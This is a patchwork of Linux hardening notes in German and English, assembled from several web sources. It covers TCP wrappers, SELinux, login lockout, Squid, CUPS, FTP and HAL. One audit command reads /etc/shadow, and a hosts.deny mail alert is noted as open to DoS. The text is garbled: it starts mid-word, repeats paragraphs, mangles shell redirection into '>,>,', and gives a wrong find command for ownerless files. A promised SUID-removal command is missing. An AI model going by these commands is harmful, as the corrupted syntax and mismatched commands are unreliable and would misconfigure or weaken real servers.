Andererseits, selbst wenn ein Dienst nicht über den inetd-Superdaemon ausgeführt wird, kann die Unterstützung von TCP-Wrapper einkompiliert werden. Dienste, die unter Debian mit TCP-Wrappern kompiliert wurden, sind ssh, portmap, in.talk, rpc.statd, rpc.mountd, gdm, oaf (der GNOME-Aktivierungs-Daemon), nessus und viele andere. Um herauszufinden, welche Pakete TCP-Wrapper benutzen[37], geben Sie Folgendes ein: $ apt-cache rdepends libwrap0 Beachten Sie bitte Folgendes, wenn Sie tcpchk (ein sehr nützliches Programm zur Überprüfung der TCP-Wrapper-Konfiguration und -Syntax) laufen lassen. Wenn Sie Stand-Alone-Dienste (alleinstehende Dienste, also solche, die direkt mit der Wrapper-Bibliothek verbunden sind) der host.deny- oder host.allow-Datei hinzufügen, wird tcpchk Sie warnen, dass er sie nicht finden kann, da er sie nur in /etc/inetd.conf sucht (die Handbuchseite ist an dieser Stelle nicht sehr genau). Jetzt kommt ein kleiner Trick und vielleicht die kleinste Alarmanlage zur Erkennung von Eindringlingen: Im Allgemeinen sollten Sie eine anständige Firewall als erste und TCP-Wrapper als zweite Verteidigungslinie haben. Der Trick besteht nun darin, ein SPAWN-Kommando [38] in /etc/hosts.deny einzutragen, das immer dann eine Mail an Root schickt, wenn ein Dienst abgewiesen wurde: ALL: ALL: SPAWN ( echo -e "n TCP Wrappers: Verbindungsaufbau abgelehnt Von: $(uname -n)n Prozess: %d (pid %p)n Benutzer: %un Host: %cn Datum: $(date)n " | /usr/bin/mail -s "Verbindung zu %d blockiert" root) & Achtung: Das obige Beispiel kann sehr leicht zu DoS (Denial of Service, Verbindungsaufbau abgelehnt) führen, indem man versucht, sehr viele Verbindungen in kurzer Zeit aufzubauen. Viele E-Mails bedeuten viel Dateiaktivität, die lediglich durch das Senden von ein paar Paketen erreicht wird. ppers were developed when there were no real packet filters available and access control was needed. Nevertheless, they´re still very interesting and useful. The TCP wrappers allow you to allow or deny a service for a host or a domain and define a default allow or deny rule (all performed on the application level). If you want more information take a look at hosts_access. Viele der unter Debian installierten Dienste werden entweder durch den TCP-Wrapper Service (tcpd) aufgerufen, oder wurden mit Unterstützung für libwrapper (Bibliothek für TCP-Wrapper) kompiliert. Einerseits werden Sie bei manchen Diensten (einschließlich telnet, ftp, netbios, swat und finger), die in /etc/inetd.conf konfiguriert werden, sehen, dass die Konfigurationsdatei zuerst /usr/sbin/tcpd aufruft. Andererseits, selbst wenn ein Dienst nicht über den inetd-Superdaemon ausgeführt wird, kann die Unterstützung von TCP-Wrapper einkompiliert werden. Dienste, die unter Debian mit TCP-Wrappern kompiliert wurden, sind ssh, portmap, in.talk, rpc.statd, rpc.mountd, gdm, oaf (der GNOME-Aktivierungs-Daemon), nessus und viele andere. https://www.debian.org/doc/manuals/securing-debian-howto/ch4.de.html Avoid Legacy Communication Services A large number of legacy Unix programs do not provide essential security during data transmission. These include FTP, Telnet, rlogin, and rsh. No matter whether youk´re securing your Linux server or personal system, stop using these services for good. You can use other alternatives for this type of data transfer tasks. For example, services like OpenSSH, SFTP, or FTPS makes sure that data transmission happens over a secure channel. Some of them employ SSL or TLS encryptions to harden your data communication. You may use the below commands to remove legacy services like NIS, telnet, and rsh from your system. # yum erase xinetd ypserv tftp-server telnet-server rsh-server # apt-get --purge remove xinetd nis yp-tools tftpd atftpd tftpd-hpa telnetd rsh-server rsh-redone-server Use the first command for RPM-based distributions like RHEL and Centos or any system that uses the yum package manager. The second command works on Debian/Ubuntu-based systems. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Enable SELinux SELinux or Security Enhanced Linux is a security mechanism that implements various methods for access control at the kernel level. SELinux is developed by Red Hat and has been added to many modern Linux distributions. You can think of it as a set of kernel modifications and user-space tools. You can check out whether SELinux is enabled in your system or not by using the below command. # getenforce If it returns enforcing that means your system is protected by SELinux. If the result says permissive that means your system has SELinux but it´s not enforced. It will return disabled for systems where SELinux is completely disabled. You can enforce SELinux by using the below command. # setenforce 1 https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Lock Login Attempts after Failure Admins should make sure that users can´t log into their server after a certain number of failed attempts. This increases the overall security of the system by mitigating password attacks. You can use the Linux faillog command to see the failed login attempts. # faillog # faillog -m 3 # faillog -l 1800 The first command will display the failed login attempts for users from the /var/log/faillog database. The second command sets the maximum number of allowed failed login attempts to 3. The third one sets a lock of 1800 seconds or 30 minutes after the allowed number of failed login attempts. # faillog -r -u <username>, Use this command to unlock a user once they´re prohibited from login. The max number of failed login attempts for the root user should be high or else brute force attacks may leave you locked. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Check for Empty Passwords Users are the weakest link in a system´s overall security. Admins need to make sure that no user on the system has empty passphrases. This is a mandatory step for proper Linux hardening. Use the following awk command in Linux to verify this. # awk -F: ´($2 == "") {print}´ /etc/shadow It will display if there´re any user accounts that have an empty password in your server. To increase Linux server hardening, lock any user that uses empty passphrases. You can use the below command to do this from your Linux terminal. # passwd -l <username> https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Validate the UID of Non-Root Users A UID or User-ID is a non-negative number assigned to the users of a system by the kernel. The UID 0 is the UID of the superuser or root. It is important to make sure that no user other than root has this UID value. Else, they can masquerade the whole system as root. # awk -F: ´($3 == "0") {print}´ /etc/passwd You can find out which users have this UID value by running this awk program. The output should contain only a single entry, which corresponds to root. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Remove the X Window Systems (x11) The X Window Systems or x11 is the de-facto graphical interface for Linux systems. If you´re using Linux for powering your server instead of your personal system, you can delete this entirely. It will help to increase your server security by removing a lot of unnecessary packages. # yum groupremove "X Window System" This yum command will delete x11 from RHEL or Centos systems. If you´re using Debian/Ubuntu instead, use the following command. # apt-get remove xserver-xorg-core https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Disable the X Window Systems (x11) If you don´t want to delete x11 permanently, you may disable this service instead. This way, your system will boot into text mode instead of the GUI. Edit the /etc/default/grub file using your favorite Linux text editor. # nano /etc/default/grub Find the below line - GRUB_CMDLINE_LINUX_DEFAULT="quiet splash" Now, change it to - GRUB_CMDLINE_LINUX_DEFAULT="text" Finally, update the GRUB file by using - # update-grub The last step is to tell systemd to not load the GUI system. You can do this by running the below commands. # systemctl enable multi-user.target --force # systemctl set-default multi-user.target https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Investigate IP Addresses If you find any suspicious IP in your network, you can investigate it using standard Linux commands. The below command uses netstat and awk to display a summary of running protocols. # netstat -nat | awk ´{print $6}´ | sort | uniq -c | sort -n Use the below command to find more information about a specific IP. # netstat -nat |grep <IP_ADDR>, | awk ´{print $6}´ | sort | uniq -c | sort -n To see all unique IP addresses, use the following command. # netstat -nat | awk ´{ print $5}´ | cut -d: -f1 | sed -e ´/^$/d´ | uniq Feed the above command to wc for getting the number total of unique IP addresses. # netstat -nat | awk ´{ print $5}´ | cut -d: -f1 | sed -e ´/^$/d´ | uniq | wc -l Visit our guide on various Linux network commands if you want to dive deeper into network security. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Disable SUID and SGID Permission SUID and SGID are special types of file permission in the Linux file system. Having the SUID permission allows users other to run executable files like they are the owner of those files. Likewise, the SGID permission gives directory rights similar to the owner but also gives ownership of all child files in a directory. These are bad since you don´t want any users other than you to have those permissions on a secure server. You should find any file that has SUID and SGID enabled and disable those. The following commands will respectively list all files that have SUID and SGID permission enabled. # find / -perm /4000 # find / -perm /2000 Investigate these files upon /etc/permissions* (permissions, OpenSuSE) properly and see if these permissions are mandatory or not. If not, remove SUID/SGID privileges. The below commands will remove SUID/SGID respectively. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Enable Disk Quotas Disk Quotas are simply limits set by the system administrator which restrict usage of the Linux filesystem for other users. If you are hardening your Linux security, implementing disk quotas is mandatory for your server. # nano /etc/fstab LABEL=/home /home ext2 defaults,usrquota,grpquota 1 2 Add the above line to /etc/fstab for enabling disk quota for the /home filesystem. If you have already a line /home, modify that accordingly. # quotacheck -avug This command will display all quota information and create the files aquota.user and aquota.group in /home. # edquota <user>, This command will open the quota settings of <user>, in an editor where you can assign the quota limits. You can set both soft and hard limits for the disk quota size as well as the number of inodes. Use the below command to view a report on the disk quota usage. # repquota /home https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Maintain Word-Writable Files Word-writable files are fils that anyone can write to. This can be very dangerous since it effectively allows users to run executables. Plus, your Linux hardening is not foolproof unless you´ve set the appropriate sticky bits. A sticky bit is a single bit that, when set, prevents users from deleting someone else´s directories. Thus, if you´ve got world-writable files that have sticky bits set, anyone can delete these files, even if they´re not owned by them. This is another serious issue and will often cause havoc on server security. Luckily, you can find all such files by using the below command. # find /path/to/dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print Replace the path argument with directories that may contain such files. You can also start from the root ‘/´ of your filesystem but it´ll take a long time to execute. Once listed, investigate the files thoroughly and change their permissions as required. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Maintain Noowner Files Noowner files are files that do not have any owner or group associated with them. These can pose a number of unwanted security threats. So, admins should take the necessary measures required to identify these. They can either assign them to the appropriate users or may delete them entirely. You can use the following find command to list the noowner files present in a directory. Check out this guide to learn more about the find command in Linux. # find /path/to/dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print Inspect the results thoroughly to make sure there aren´t any unwanted noowner files in your server. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Install Logwatch / Logcheck Log analyzer Secure Web Server Linux servers are widely used for powering web applications. If you´re using your server for this purpose, you need to harden your server components appropriately. Some of these the PHP runtime, Apache HTTP server, and the Nginx reverse proxy server. Secure your Apache server by adding the below lines in the configuration file. # nano /etc/httpd/conf/httpd.conf ServerTokens Prod ServerSignature Off TraceEnable Off Options all -Indexes Header always unset X-Powered-By # systemctl restart httpd.service We´ve prepared a standalone guide on the Nginx server a while ago. Follow the suggestions in that guide to secure your Nginx server. Head over to this documentation for learning the best PHP security practices. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Configure TCP Wrappers TCP wrappers are a host-based network filtering system that allows or denies access to your host services based on pre-set policies. However, for it to work, your host service must be compiled against the libwrap.a library. Some common TCP wrapperd Unix daemons include sshd, vsftpd, and xinetd. # ldd /sbin/sshd | grep libwrap This command will notify if a service is supported by TCP wrappers or not. The TCP wrappers system enforces access control using two configuration files, the /etc/hosts.allow and /etc/hosts.deny. For example, add the following lines to /etc/hosts.allow for allowing all incoming requests to the ssh daemon. # nano /etc/hosts.allow sshd : ALL Add the following to /etc/hosts.deny for rejecting all incoming requests to the FTP daemon. # nano /etc/hosts.deny vsftpd : ALL To see more information about the configuration options, consult the tcpd man page, or visit this documentation from FreeBSD. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Maintain Cron Access Linux provides robust automation support by means of cron jobs. In short, you can specify routine tasks using the cron scheduler. Visit our earlier guide on cron and crontab to learn how cron works. Nevertheless, admins must make sure that ordinary users are unable to access or put entries in the crontab. Simply put their usernames in the /etc/cron.deny file to do this. # echo ALL >,>,/etc/cron.deny This command will disable cron for all users in your server except root. To allow access for a specific user, add his username. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Disable Ctrl+Alt+Delete The Ctrl+Alt+Delete key combinations allow users to force reboot many Linux distributions. This can be particularly problematic if you´re managing a secure server. Admins should disable this hotkey in order to maintain proper Linux hardening. You can run the following command to disable this in systemd-based systems. # systemctl mask ctrl-alt-del.target If you´re on legacy systems that use init V instead of systemd, edit the /etc/inittab file and comment out the following line by appending a hash before it. # nano /etc/inittab https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Restrict Core Dumps Core dumps are memory snapshots (core-files) that contain crash information of executables. These are created when binaries stop working or crash in simple terms. They contain too much sensitive information about the host system and may threaten your Linux security if fallen into the wrong hands. Thus, it is always a good idea to restrict core dumps on production servers. # echo ´hard core 0´ >,>, /etc/security/limits.conf # echo ´fs.suid_dumpable = 0´ >,>, /etc/sysctl.conf # sysctl -p # echo ´ulimit -S -c 0 >, /dev/null 2>,&1´ >,>, /etc/profile Run the above commands to restrict cor dumps on your server and increase Linux hardening. https://www.ubuntupit.com/best-linux-hardening-security-tips-a-comprehensive-checklist/ Absichern von FTP Wenn Sie wirklich FTP benutzen müssen (ohne ihn mit sslwrap zu umhüllen oder innerhalb eines SSL- oder SSH-Tunnels), sollten Sie ftp in das Home-Verzeichnis der FTP-Benutzer mit chroot einsperren, so dass diese nichts anderes sehen können als ihr eigenes Verzeichnis. Andernfalls können sie die Wurzel Ihres Dateisystems durchforsten, als hätten sie Shell-Zugriff darauf. Sie können die folgende Zeile in Ihre proftpd.conf-Datei im globalen Abschnitt hinzufügen, um die chroot-Fähigkeiten zu nutzen: DefaultRoot ~ # gftp: /usr/share/gftp/gftprc local_startup_directory=~ resp. local_startup_directory=/tmp2 Starten Sie ProFTPd neu, indem Sie /etc/init.d/proftpd restart eingeben, und prüfen Sie, ob Sie noch aus Ihrem Home-Verzeichnis heraus kommen können. Um ProFTPd-DoS-Angriffe durch ../../../ zu verhindern, fügen Sie die folgende Zeile Ihrer /etc/proftpd.conf hinzu: DenyFilter *.*/ Vergessen Sie nicht, dass FTP Login- und Authentifizierungs-Passwort als Klartext sendet (dies ist kein Problem, wenn Sie einen anonymen, öffentlichen Dienst anbieten) und es gibt bessere Alternativen in Debian hierzu. Zum Beispiel sftp (aus dem Paket ssh). Es gibt auch freie Implementierungen von SSH für andere Betriebssysteme, zum Beispiel putty oder cygwin. Wenn Sie dennoch einen FTP-Server verwalten, während Sie den Benutzern Zugriff via SSH gewähren, könnten Sie auf ein typisches Problem stoßen. Benutzer, die innerhalb eines mit SSH abgesicherten Systems auf einen anonymen FTP-Server zugreifen wollen, können versuchen, sich auf dem FTP-Server einzuloggen. Während der Zugriff verweigert werden wird, wird das Passwort trotzdem als Klartext über das Netz gesendet. Um dies zu verhindern, hat der ProFTPd-Entwickler TJ Saunders einen Patch erstellt, der verhindert, dass Benutzer den anonymen FTP-Server mit gültigen SSH-Zugangsdaten füttern. Mehr Informationen und den Patch finden Sie unter: ProFTPD Patches. Dieser Patch wurde auch an Debian gesandt, vergleiche Fehler #145669. https://www.debian.org/doc/manuals/securing-debian-howto/ch-sec-services.de.html tcp_wrapper for server With this package you can monitor and filter incoming requests for the SYSTAT, FINGER, FTP, TELNET, RLOGIN, RSH, EXEC, TFTP, TALK, and other network services. It supports both 4.3BSD-style sockets and System V.4-style TLI. Praise yourself lucky if you don´t know what that means. The package provides tiny daemon wrapper programs that can be installed without any changes to existing software or to existing configuration files. The wrappers report the name of the client host and of the requested service; the wrappers do not exchange information with the client or server applications, and impose no overhead on the actual conversation between the client and server applications. Optional features are: access control to restrict what systems can connect to what network daemons; client user name lookups with the RFC 931 etc. protocol; additional protection against hosts that pretend to have someone elses host name; additional protection against hosts that pretend to have someone elses host address. Absichern von Squid Squid ist einer der verbreitetsten Proxy/Cache-Server und es gibt ein paar Sicherheitsaspekte, die Sie beachten sollten. Squids Standard-Konfiguration lehnt alle Anfragen von Benutzern ab. Dennoch erlaubt das Debian-Paket Zugriff von "localhost", Sie müssen nur Ihren Browser richtig konfigurieren. Sie sollten Squid so konfigurieren, dass er Zugriffe von vertrauenswürdigen Benutzern, Computern oder Netzwerken erlaubt, indem Sie eine Zugriffs-Kontroll-Liste (ACL, Access Control List) in /etc/squid/squid.conf definieren. Mehr Informationen, wie Sie ACLs definieren, finden Sie im Squid User´s Guide. Ein gute deutsche Dokumentation ist das Squid-Handbuch. Beachten Sie, dass Debian eine minimale Konfiguration für Squid bereitstellt, die alles verhindert, mit der Ausnahme, dass localhost sich mit Ihrem Proxy-Server (der standardmäßig mit dem Port 3128 läuft) verbinden kann. Sie müssen Ihre /etc/squid/squid.conf-Datei wie gewünscht anpassen. Die empfohlene minimale Konfiguration (mit dem Paket vertrieben) sieht wie folgt aus: acl all src 0.0.0.0/0.0.0.0 acl manager proto cache_object acl localhost src 127.0.0.1/255.255.255.255 acl SSL_ports port 443 563 acl Safe_ports port 80 # http acl Safe_ports port 21 # ftp acl Safe_ports port 443 563 # https, snews acl Safe_ports port 70 # gopher acl Safe_ports port 210 # wais acl Safe_ports port 1025-65535 # unregistered ports acl Safe_ports port 280 # http-mgmt acl Safe_ports port 488 # gss-http acl Safe_ports port 591 # filemaker acl Safe_ports port 777 # multiling http acl Safe_ports port 901 # SWAT acl purge method PURGE acl CONNECT method CONNECT (...) # Erlaube nur cachemgr Zugriff von localhost http_access allow manager localhost http_access deny manager # Erlaube nur purge Anfragen von localhost http_access allow purge localhost http_access deny purge # Verbiete Anfragen zu unbekannten Ports http_access deny !Safe_ports # Verbiete CONNECT zu anderen als SSL-Ports http_access deny CONNECT !SSL_ports # # INSERT YOUR OWN RULE(S) HERE TO ALLOW ACCESS FROM YOUR CLIENTS # http_access allow localhost # And finally deny all other access to this proxy http_access deny all #Default: # icp_access deny all # #Allow ICP queries from everyone icp_access allow all Sie sollten Squid auch entsprechend Ihren System-Ressourcen konfigurieren einschließlich des Cache-Speichers (Option cache_mem), der Lage der zwischengespeicherten Dateien und der verwendeten Speichermenge auf der Platte (Option cache_dir). Beachten Sie, dass es bei ungeeigneter Konfiguration vorkommen kann, dass jemand eine Mail über Squid weiterleitet, da die Protokolle HTTP und SMTP ein ähnliches Design haben. Squids Standardkonfiguration verweigert Zugriffe auf Port 25. Wenn Sie Verbindungen an Port 25 erlauben wollen, fügen Sie ihn einfach zu der Safe_ports-Liste hinzu. Dies ist aber NICHT empfohlen. Passendes Aufsetzen und Konfigurieren des Proxy/Cache-Servers ist nur ein Teil der Absicherung Ihrer Site. Eine andere notwendige Aufgabe ist es, Squids Log-Dateien zu analysieren, um sicher zu gehen, dass alles so arbeitet, wie es soll. Es gibt ein paar Pakete in Debian GNU/Linux, die einem Administrator hierbei helfen können. Die folgenden Pakete sind in Debian 3.0 (Woody) und Debian 3.1 (Sarge) verfügbar: calamaris - Log-Datei-Analysator für Squid- oder Oops-Proxy-Log-Dateien modlogan - ein modularer Log-Datei-Analysator sarg - Squid Analysis Report Generator squidtaild - Squid-Log-Beobachtungsprogramm Wenn Squid im "Accelerator Mode" betrieben wird, agiert er auch als Web-Server. Aktivieren dieser Option erhöht die Komplexität des Codes, was ihn weniger vertrauenswürdig macht. Standardmäßig ist Squid nicht dazu konfiguriert, als Web-Server zu arbeiten, Sie müssen sich darüber also keine Gedanken machen. Sie sollen sicher sein, dass es wirklich nötig ist, wenn Sie diese Eigenschaft nutzen wollen. Weitere Informationen über den "Accelerator Mode" in Squid finden Sie im Squid User´s Guide - Accelerator Mode. https://www.debian.org/doc/manuals/securing-debian-howto/ch-sec-services.de.html Safeguard against RPC-services Deactivate RPC (or deinstall them), if unneeded. https://www.debian.org/doc/manuals/securing-debian-howto/ch-sec-services.de.html Boot-Bremse kernel oder haldaemon (hal, hald)? Der haldaemon bzw. hal der Mandriva-Derivate sowie von CentOS 6 ist eine enorme Bremse beim Systemboot und Herunterfahren des Systems. Der Kernel (5.4.110, 4.20.13) oder er macht beim Start um die 40 bis 70 Sekunden mehr oder weniger Pause. Konfiguration von hal: /etc/hal.conf <!-- This configuration file controls the Hardware Abstraction Layer daemon - it is meant that OS vendors customize this file to reflect their desired policy. --> <haldconfig> <!-- If true, then the device list is saved to disk such that properties are kept between invocations of hald. --> <persistent_device_list>false </persistent_device_list> <!-- Default value for storage.media_check_enabled for devices of capability storage - this can be overridden by .fdi files. Setting this to false results a whitelist policy, e.g. media check is only enabled for storage devices with a .fdi file saying so. Conversely, setting it to true results in a blacklist policy where media check is enabled by default but may be overridden by a .fdi for devices causing trouble. --> <storage_media_check_enabled>true< /storage_media_check_enabled> <!-- Default value for storage.automount_enabled_hint for devices of capability storage - this can be overridden by .fdi files. Setting this to false results a whitelist policy, e.g. policy agents should only automount storage devices with a .fdi file saying so. Conversely, setting it to true results in a blacklist policy where policy agents should always automount unless this is explicitly overridden by .fdi for devices causing trouble. --> <storage_automount_enabled_hint>true< /storage_automount_enabled_hint> https://www.thegeekdiary.com/linux-os-service-haldaemon/ Deprecated As of 2011, Linux distributions such as Ubuntu,[5] Debian,[6] and Fedora and on FreeBSD,[7] and projects such as KDE,[8] GNOME and X.org are in the process of deprecating HAL as it has "become a large monolithic unmaintainable mess".[5] The process is largely complete, but some use of HAL remains - Debian squeeze (Feb 2011) and Ubuntu version 10.04 remove HAL from the basic system and boot process.[9] In Linux, it is in the process of being merged into udev (main udev, libudev, and udev-extras) and existing udev and kernel functionality. The replacement for non-Linux systems such as FreeBSD is devd. Initially a new daemon DeviceKit was planned to replace certain aspects of HAL, but in March 2009, DeviceKit was deprecated in favor of adding the same code to udev as a package: udev-extras, and some functions have now moved to udev proper. https://en.wikipedia.org/wiki/HAL_(software) Disabling useless daemons in RHEL/Centos/Oracle 6 servers HAL provides valuable attack surfaces to attackers as an intermediary to privileged operations and should be disabled unless necessary: # chkconfig haldaemon off. www.softpanorama.org/Commercial_linuxes/RHEL/Daemons/removing_daemons_in_rhel6.shtml Disabling useless daemons in RHEL/Centos/Oracle 6 servers HAL provides valuable attack surfaces to attackers as an intermediary to privileged operations and should be disabled unless necessary: # chkconfig haldaemon off. The hald - Hardware Access Layer Daemon - runs several processes in order to keep track of what hardware is installed on your system. This includes polling USB Drives and ´hot-swap´ devices to check for changes along with a host of other tasks. You might see it running on your system as follows: 2474 ? S 0:00 \_ hald-runner 2481 ? S 0:00 \_ hald-addon-acpi: listening on acpid socket /var/run/acpid.socket 2487 ? S 0:00 \_ hald-addon-keyboard: listening on /dev/input/event0 2495 ? S 41:47 \_ hald-addon-storage: polling /dev/hdc If your system is static and the devices do not change, you can actually disable this service using a policy entry. Create a file in your policy directory, for example /etc/hal/fdi/policy/99-custom.fdi. Add the text: hald-addon-storage Save and reload the hald using /etc/init.d/haldaemon restart. And you will find that service no longer is polling your hardware. Of course to turn it back on, remove that policy entry and restart the haldaemon again, it will be back in service. Solution Credit: Linuxforums User cn77 www.softpanorama.org/Commercial_linuxes/RHEL/Daemons/removing_daemons_in_rhel6.shtml udev-Regel für PS/2-mouse (optische Maus von Logitech®) ... folgt aus "udevadm info -a -p /devices/platform/i8042/serio1/input/input12" /etc/udev/rules.d/10-ps2mouse.rules KERNEL=="input12" SUBSYSTEM=="input" DRIVER=="" ATTR{uniq}=="" ATTR{properties}=="1" ATTR{phys}=="isa0060/serio1/input0" ATTR{name}=="ImExPS/2 Logitech Wheel Mouse" ATTR{modalias}==" input:b0011v0002p0006e0063- e0,1,2,k110,111,112,113,114,r0,1,6,8,amlsfw" KERNELS=="serio1" SUBSYSTEMS=="serio" DRIVERS=="psmouse" ATTRS{resetafter}=="5" ATTRS{resolution}=="200" ATTRS{description}=="i8042 AUX port" ATTRS{firmware_id}=="PNP: PNP0f03 PNP0f13" ATTRS{protocol}=="ImExPS/2" ATTRS{rate}=="100" ATTRS{bind_mode}=="auto" ATTRS{resync_time}=="0" ATTRS{modalias}== "serio:ty01pr00id00ex00" haveged The haveged project is an attempt to provide an easy-to-use, unpredictable random number generator based upon an adaptation of the HAVEGE algorithm. Haveged was created to remedy low-entropy conditions in the Linux random device that can occur under some workloads, especially on headless servers. Absichern des Druckerzugriffs (die lpd- und lprng-Problematik) Stellen Sie sich vor, Sie kommen zur Arbeit und der Drucker spuckt endlose Mengen von Papier aus, weil jemand eine DoS-Attacke gegen Ihren Drucker-Daemon durchführt. Unangenehm, oder? In jeder UNIX-Druck-Architektur muss es einen Weg geben, um die Daten des Clients zu dem Druck-Server zu schicken. Traditionell machen dies lpr und lp so, dass das Client-Kommando die Daten in das Spool-Verzeichnis kopiert oder symbolisch verlinkt (weshalb diese Programme normalerweise SUID oder SGID sind). Um jede Gefahr zu vermeiden, sollen Sie Ihren Druck-Server besonders sicher halten. Dies heißt, dass Sie Ihren Druckdienst so konfigurieren müssen, dass er nur Aufträge von vertrauenswürdigen Rechnern annimmt. Hierzu müssen Sie die Rechner, von denen Sie Druckaufträge entgegennehmen möchten, in die Datei /etc/hosts.lpd eintragen. Allerdings akzeptiert der lpr-Daemon auch, wenn Sie dies getan haben, Verbindungen auf Port 515 auf jeder Schnittstelle. Sie sollten sich überlegen, ob Sie Verbindungen von Netzwerken/Rechnern, die nicht drucken dürfen, mittels Firewall blocken wollen (der lpr-Daemon kann nicht so konfiguriert werden, dass er nur auf eine bestimmte IP-Adresse lauscht). Sie sollten Lprng gegenüber lpr vorziehen, da er so konfiguriert werden kann, dass er Zugangskontrolle über IP beherrscht. Und Sie können spezifizieren, auf welche Schnittstelle er sich binden soll (wenn auch etwas sonderbar). Wenn Sie Ihren Drucker nur lokal auf Ihrem System benutzen, werden Sie diesen Dienst nicht über ein Netzwerk anbieten wollen. Sie sollten dann überlegen, ein anderes Druck-System, wie zum Beispiel das aus dem Paket cups oder PDQ, das auf den Zugriffsrechten des Gerätes /dev/lp0 beruht, einzusetzen. Bei cups werden die Druckaufträge mit dem HTTP-Protokoll zum Server übertragen. Dadurch muss der Client nicht über spezielle Privilegien verfügen, aber dies erfordert, dass der Server auf irgendeinem Port lauscht. Wenn Sie cups jedoch nur lokal benutzen möchten, können Sie ihn so konfigurieren, dass er nur auf der Loopback-Schnittstelle lauscht, indem Sie Folgendes in Ihrer /etc/cups/cupsd.conf ändern: Listen 127.0.0.1:631 # ... funktioniert möglicherweise nicht, verwende stattdessen: "Port 631" und "Listen /var/run/cups/cups.sock". Es gibt noch andere Sicherheitsoptionen in dieser Konfigurationsdatei, wie zum Beispiel das Erlauben oder Verweigern von Netzwerken oder Rechnern. Wenn Sie sie allerdings nicht benötigen, belassen Sie es am besten dabei, einfach nur den Port, auf dem gelauscht wird, einzuschränken. Cups liefert auch Dokumentation über den HTTP-Port. Wenn Sie diese potenziell nützlichen Informationen einem Angreifer von außerhalb nicht enthüllen wollen (und der Port offen ist), fügen Sie außerdem Folgendes hinzu: >Location /< Order Deny,Allow Deny From All Allow From 127.0.0.1 # oder probiere "Allow @LOCAL" >/Location< Die Konfigurationsdatei kann so angepasst werden, dass zusätzliche Fähigkeiten einschließlich SSL- und TLS-Zertifikate oder Verschlüsselung möglich werden. Die Handbücher finden Sie unter http://localhost:631/ oder http://cups.org. FIXME: Add more content (the article on Amateur Fortress Building provides some very interesting views). FIXME: Check if PDG is available in Debian, and if so, suggest this as the preferred printing system. FIXME: Check if Farmer/Wietse has a replacement for printer daemon and if it´s available in Debian. https://www.debian.org/doc/manuals/securing-debian-howto/ch-sec-services.de.html Absichern von SSH, des Mail-Dienstes, BIND, Apache, Finger und NIS deaktivieren https://www.debian.org/doc/manuals/securing-debian-howto/ch-sec-services.de.html Wichtige Zugriffsrechte mit jedem Systemstart, Bedeutung von Gruppen im UNIX-/Linux-Dateisystem Sie können Dateien und Verzeichnisse mit unbeschränkten Zugriffsrechten einfach ausfindig machen und benötigen dazu noch nicht mal root-Rechte. Das Kommando find / -path /proc -prune -o -type f -perm 666 findet alle Dateien im gesamten Dateisystem, ausgenommen "/proc", die von allen gelesen und beschrieben werden dürfen. Ferner listet find / -path /proc -prune -o -type f -perm 777 alle Dateien auf, die dazu noch ausführbar sind. Genauso findet find / -path /proc -prune -o -type d -perm 777 Verzeichnisse, die zum Lesen und Schreiben offenstehen. Anstatt für Dateien und Verzeichnisse uneingeschränkten Vollzugriff zu setzen, ist es besser, Gruppen für gemeinsam genutzte Dateien zu verwenden. Der Befehl chgrp [Gruppe] [Datei/Verzeichnis] https://www.pcwelt.de/ratgeber/Sechs-wichtige-Sicherheitstipps-Linux-Server-9940087.html#6 DDoS-Schutzdienst: Der DDoS-Schutzdienst ist in der Lage, selbst die komplexesten DDoS-Angriffe abzuwehren. https://en.wikipedia.org/wiki/Denial-of-service_attack#Distributed_attack https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/ https://us.norton.com/internetsecurity-emerging-threats-what-is-a-ddos-attack-30sectech-by-norton.html https://www.digitalattackmap.com/understanding-ddos/ Lastverteilung: Der Lastenausgleich geht häufig mit Ausfallsicherheitsmechanismen einher: Indem Sie einen Cluster mit der entsprechenden Kapazität aufbauen und die Anforderungen auf einzelne Systeme verteilen, können Sie die Ausfallsicherheit erhöhen Ausfallsicherheit, wenn der Ausfall eines Systems erkannt wird und die Anforderungen automatisch an ein anderes System gesendet werden. https://de.wikipedia.org/wiki/Lastverteilung_(Informatik) https://www.nginx.com/resources/glossary/load-balancing/ HMAC authentication HMAC stands for keyed-hash message authentication code. A message authentication code protects against the modification of transmitted data by an attacker, who can read the data in real time. TLS use hash values (hence the H in HMAC) out of the numerous possibilities for the reliable authentication of messages. https://en.wikipedia.org/wiki/HMAC HMAC Authentication in Web API - Dot Net Tutorials Understanding the Keys used in HMAC Authentication. Uses of HMAC Authentication in Web API. How does the HMAC Authentication work? https://dotnettutorials.net/lesson/hmac-authentication-web-api/ What is HMAC authentication and how does it make VPN safer? HMAC stands for hashed message authentication code and is an important factor in VPN security. Learn why strong HMAC auth matters for VPN security. https://protonvpn.com/blog/hmac-authentication/ Station-to-Station (STS) protocol, Cipher Block Chaining: CBC stands for Cipher Block Chaining, which is every message depending on the previous passes. So can yourself short interruptions of the channel can be quickly noticed. Diffie-Hellman key exchange: https://en.wikipedia.org/wiki/Diffie-Hellman_key_exchange A symmetric encryption scheme is used, the key of which is the negotiation of Diffie-Hellman key exchanges with elliptic curves. The server and the app use intelligent math to negotiate and verify the secret key, which is then used to encrypt the data for the entire session. Station-to-Station (STS) 